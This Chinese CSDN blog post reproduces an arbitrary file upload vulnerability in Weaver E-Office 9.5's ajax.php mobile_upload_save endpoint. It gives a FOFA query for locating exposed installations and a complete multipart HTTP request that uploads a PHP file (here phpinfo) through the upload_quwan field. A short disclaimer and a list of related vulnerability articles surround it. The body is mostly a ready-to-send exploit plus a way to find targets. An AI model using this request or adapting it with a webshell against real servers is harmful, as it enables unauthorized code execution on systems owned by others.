泛微 E-Office 9.5版本存在ajax.php接口任意文件上传漏洞

最新推荐文章于 2024-05-23 15:57:40 发布
最新推荐文章于 2024-05-23 15:57:40 发布
阅读量629 收藏
点赞数 23
文章标签: 泛微 E-Office 文件上传 ajax.php接口 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wan___she__pi/article/details/137911176
版权

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

泛微 E-Office 9.5版本存在代码问题漏洞,泛微e-office系统ajax.php接口存在任意文件上传漏洞

资产搜索

fofa

app="泛微-EOffice"

漏洞复现

POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Content-Type: multipart/form-data; boundary=c2307d1cd1165cfacd8cd7c008f44d1e
Cookie: testBanCookie=test; ecology_JSessionId=abcLQ67J8J80DciAxUz5y; JSESSIONID=abcLQ67J8J80DciAxUz5y; ecology_JSessionid=abcLQ67J8J80DciAxUz5y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept-Encoding: gzip, deflate
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Host: 127.0.0.1
Content-Length: 334
Expect: 100-continue
Connection: close

--c2307d1cd1165cfacd8cd7c008f44d1e
Content-Disposition: form-data; name="upload_quwan"; filename="ceshi.php."
Content-Type: image/jpeg

<?php phpinfo();?>
--c2307d1cd1165cfacd8cd7c008f44d1e
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


--c2307d1cd1165cfacd8cd7c008f44d1e--

cn_大腿
关注
  • 23
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
E-Office文件漏洞复现(CVE-2023-2523、CVE-2023-2648)
0xSec
05-23 1万+
E-Office是一款标准化的协同 OA 办公软件,协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。e-office 9.5版本,源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。参数 upload_quwan 的操作导致不受限制的上,未经身份验证的恶意攻击者通过上恶意文件,从而获取目标服务器的控制权限。
jsessionid的简单说明
热门推荐
菜鸟博客
04-11 7万+
1)第一次访问服务器的时候,会在响应头里面看到Set-Cookie信息(只有在首次访问服务器的时候才会在响应头中出现该信息) 。 上面的图JSESSIONID=ghco9xdnaco31gmafukxchph;Path=/acr, 浏览器会根据响应头的set-cookie信息设置浏览器的cookie并保存之 注意此cookie由于没有设置cookie有效日期,所以在关闭浏览器的情况下会丢失...
漏洞预警】E-mobile v9.5任意文件漏洞
做自己喜欢的事,并将其发挥到极致!
05-31 4440
E-mobile v9.5 存在任意文件漏洞
【nday】2023hvv 漏洞合集
最新发布
伏一
05-23 586
【nday】2023hvv 漏洞合集
java session id 生成_session对象在web开发中的创建以及sessionId生成并返回客户端的运行机制...
weixin_36481965的博客
02-16 763
session对象当客户端首次访问时,创建一个新的session对象。并同时生成一个sessionId,并在此次响应中将sessionId 以响应报文的方式些回客户端浏览器内存或以重写url方式送回客户端,来保持整个会话,只要sever端的这个session对象没有销毁,以后再调用 request.getSession()时就直接根据客户端的sessionId来检索 server端生成的sessi...
1day后台RCE审计漏洞
渗透测试研究中心
12-30 1049
某应用存在后台RCE,根据相关信息,我们在对后台审计过程,这里发现一处调用newInstance实例化溯源找到InterfaceRegisterCustomOperationCmd #excute访问路径为 /api/integration/workflowflow/getInterfaceRegisterCustomOperationgetInterfaceRegisterCustomOper...
e-office短信插件_短信接口开发_e-office短信发送设置
02-11
e-office V10.0版本中,设置短信发送功能需要通过短信接口进行开发。下面将详细介绍e-office短信插件的设置步骤和短信接口的开发过程。 一、e-office短信插件设置 e-office短信插件是...
E-Office10远程代码执行漏洞
05-06
E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上的PHAR文件存在的缺陷。攻击者能够上伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
e-office10to11升级包(适用10.0-20221012)
12-20
协同办公平台e-office10 to e-office11升级包(适用10.0_20221012) 版本: 11.0_2022 发布日期: 2022-11-22 适合升级版本: 10.0_20221012版 注意事项: 1.标准升级程序包,不适用于做过二次开发的10.0系统,...
OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
e-office 9.0 150304 补丁程序.rar
06-12
e-office 9.0 150304 补丁程序
漏洞复现】e-office系统ajax.php接口存在任意文件漏洞
失心少年
04-18 302
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他! E-Office 9.5版本存在代码问题漏洞e-office系统ajax.php接口存在任意文件漏洞漏洞链接:http://127.0.0.1/E-mobile/App/Ajax/ajax.php?
E-Mobile移动端开发日志
Aspher的博客
11-30 1074
移动端开发的一些记录。
JSESSIONID理解
weixin_43690534的博客
11-18 766
JSESSIONID理解   平常写项目的时候大家都会用到的session对象来存储一些的用户的信息。但是我们都知道session对象其实是存储到服务器端的。那我们客户端如何和服务器端联系呢。其实他们之间的联系是通过的 JSESSIONID 联系的。 JSESSIONID的使用    JSESSIONID是以cookie的形式存储到客户端的。我之前有看过教程说 JSESSIONID的创建是当用户第...
前端开发对JSESSIONID的初步了解:JSESSIONID的产生以及简单说明
yimeichengxuyuan的博客
06-07 7434
Jsessionid只是tomcat的对sessionid的叫法,其实就是sessionid;在其它的容器也许就不叫jsessionid了。 首先谈一下对session对象在web开发中的创建以及sessionId生成并返回客户端的运行机制。 session对象当客户端首次访问时,创建一个新的session对象,并同时生成一个sessionid,并对次响应中将sessionid以响应报文的方式显回客户端浏览器内存或以重写url方式送回客户端,来保证整个会话,只要sever端的这个session对象没有销毁,
Jsessionid的误区
weixin_33859231的博客
08-27 130
一个常见的误解是以为session在有客户端访问时就被创建 然而事实是直到某server端程序调用 HttpServletRequest.getSession(true)这样的语句时才被创建。 注意!!!!!!!! 如果JSP没有显示的使用 <%@ page session="false"%> 关闭session 则JSP文件在编译成Se...
shop363网站程序漏洞利用
小驹的专栏
02-09 1244
1. 搜索 :技术支持 shop363.net               2. 数据库:data_shop363/date_shop363_shop.mdb 3. 后台:/admin_shop363
e-cology9 filedownload.jsp 任意文件读取
11-24
e-cology9 是一款企业级办公自动化软件,然而它的 filedownload.jsp 存在任意文件读取漏洞。攻击者可以通过构造恶意的请求,访问该漏洞并读取系统中的任意文件,包括敏感信息如用户凭证、配置文件和数据库等数据。这种漏洞可能对企业的数据安全造成严重威胁,因此需要尽快得到修复。 修复这个漏洞的方法之一是及时升级软件版本,确保安装了最新的补丁程序。此外,也可以通过屏蔽 filedownload.jsp 文件或者限制其访问权限的方法来暂时防范该漏洞。另外,加强网络安全防护,限制外部访问和加密重要数据,也是保护系统安全的有效手段。同时,企业也应该加强对于软件漏洞的监测和应急处理能力,及时发现和处理类似问题,减少潜在的安全隐患。 总的来说, e-cology9 的 filedownload.jsp 任意文件读取漏洞可能对企业的数据和信息安全造成严重威胁,需要引起重视并及时采取措施加以修复和预防。企业需要全面加强系统的安全防护能力,加强漏洞管理和修复工作,以确保企业信息系统的安全稳定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值